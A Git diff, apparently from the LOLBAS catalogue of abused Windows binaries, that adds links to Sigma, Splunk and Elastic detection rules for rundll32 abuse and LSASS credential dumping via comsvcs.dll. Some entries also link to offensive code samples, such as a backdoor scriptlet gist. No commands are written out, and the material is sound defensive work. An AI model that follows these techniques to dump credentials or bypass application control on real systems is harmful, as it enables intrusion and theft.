- Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
|
||||||
|
@ -29,7 +29,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/Hexacorn/status/885258886428725250
|
- Link: https://twitter.com/Hexacorn/status/885258886428725250
|
||||||
- Link: https://twitter.com/pabraeken/status/991768766898941953
|
- Link: https://twitter.com/pabraeken/status/991768766898941953
|
||||||
|
@ -26,7 +26,8 @@ Code_Sample:
|
|||||||
- Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
|
- Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
|
||||||
- Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415
|
- Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___syssetup.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/pabraeken/status/994392481927258113
|
- Link: https://twitter.com/pabraeken/status/994392481927258113
|
||||||
- Link: https://twitter.com/harr0ey/status/975350238184697857
|
- Link: https://twitter.com/harr0ey/status/975350238184697857
|
||||||
|
@ -52,7 +52,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
|
- Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
|
||||||
- Link: https://twitter.com/DissectMalware/status/995348436353470465
|
- Link: https://twitter.com/DissectMalware/status/995348436353470465
|
||||||
|
@ -24,7 +24,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/moriarty_meng/status/977848311603380224
|
- Link: https://twitter.com/moriarty_meng/status/977848311603380224
|
||||||
- Link: https://twitter.com/bohops/status/997896811904929792
|
- Link: https://twitter.com/bohops/status/997896811904929792
|
||||||
|
@ -16,7 +16,11 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
|
- Code: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: MiniDump being used in library
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/1ff5e226ad8bed34916c16ccc77ba281ca3203ae/rules/windows/process_creation/win_process_dump_rundll32_comsvcs.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b81839e3ce507df925d6e583e569e1ac3a3894ab/rules/windows/process_access/sysmon_lsass_dump_comsvcs_dll.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_comsvcs_procdump.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_comsvcs_dll.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
|
- Link: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user